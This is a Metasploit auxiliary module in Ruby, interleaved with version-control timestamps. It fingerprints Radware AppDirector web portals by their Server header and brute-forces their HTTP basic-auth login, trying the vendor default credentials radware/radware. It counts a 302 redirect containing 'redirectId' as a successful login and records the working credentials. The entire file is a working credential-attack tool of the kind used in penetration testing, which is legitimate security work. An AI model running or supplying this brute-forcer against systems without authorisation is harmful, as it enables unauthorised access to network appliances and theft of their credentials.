2013-10-03 14:45:52 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-21 20:57:23 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-10-03 14:45:52 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-10-03 14:45:52 +00:00
|
|
|
|
2013-10-21 20:57:23 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::AuthBrute
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Radware AppDirector Bruteforce Login Utility',
|
|
|
|
'Description' => %{
|
|
|
|
This module scans for Radware AppDirector's web login portal, and performs login brute force
|
|
|
|
to identify valid credentials.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'DB_ALL_CREDS' => false,
|
|
|
|
'BLANK_PASSWORDS' => false
|
|
|
|
}
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true]),
|
|
|
|
OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'radware'", "radware"]),
|
|
|
|
OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'radware'", "radware"])
|
|
|
|
], self.class)
|
2016-05-27 21:25:42 +00:00
|
|
|
|
2016-05-27 23:37:04 +00:00
|
|
|
deregister_options('HttpUsername', 'HttpPassword')
|
2013-10-21 20:57:23 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
unless is_app_radware?
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("Starting login brute force...")
|
2013-10-21 20:57:23 +00:00
|
|
|
each_user_pass do |user, pass|
|
|
|
|
do_login(user, pass)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# What's the point of running this module if the target actually isn't Radware
|
|
|
|
#
|
|
|
|
|
|
|
|
def is_app_radware?
|
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => '/',
|
|
|
|
'method' => 'GET'
|
|
|
|
})
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_error("HTTP Connection Failed, Aborting")
|
2013-10-21 20:57:23 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server"))
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_good("Running Radware portal...")
|
2013-10-21 20:57:23 +00:00
|
|
|
return true
|
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_error("Application is not Radware. Module will not continue.")
|
2013-10-21 20:57:23 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2015-07-23 23:07:19 +00:00
|
|
|
def report_cred(opts)
|
|
|
|
service_data = {
|
|
|
|
address: opts[:ip],
|
|
|
|
port: opts[:port],
|
|
|
|
service_name: opts[:service_name],
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: fullname,
|
|
|
|
username: opts[:user],
|
|
|
|
private_data: opts[:password],
|
|
|
|
private_type: :password
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: create_credential(credential_data),
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
proof: opts[:proof]
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
|
2013-10-21 20:57:23 +00:00
|
|
|
#
|
|
|
|
# Brute-force the login page
|
|
|
|
#
|
|
|
|
|
|
|
|
def do_login(user, pass)
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
|
2013-10-21 20:57:23 +00:00
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => '/',
|
|
|
|
'method' => 'GET',
|
|
|
|
'authorization' => basic_auth(user,pass)
|
|
|
|
})
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_error("HTTP Connection Failed, Aborting")
|
2013-10-21 20:57:23 +00:00
|
|
|
return :abort
|
|
|
|
end
|
|
|
|
|
|
|
|
if (res and res.code == 302 and res.headers['Location'].include?('redirectId'))
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
|
2015-07-23 23:07:19 +00:00
|
|
|
report_cred(
|
|
|
|
ip: rhost,
|
|
|
|
port: rport,
|
|
|
|
service_name: 'Radware AppDirector',
|
|
|
|
user: user,
|
|
|
|
password: pass,
|
|
|
|
proof: res.headers['Location']
|
|
|
|
)
|
2013-10-21 20:57:23 +00:00
|
|
|
return :next_user
|
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
|
2013-10-21 20:57:23 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
2013-10-03 14:45:52 +00:00
|
|
|
end
|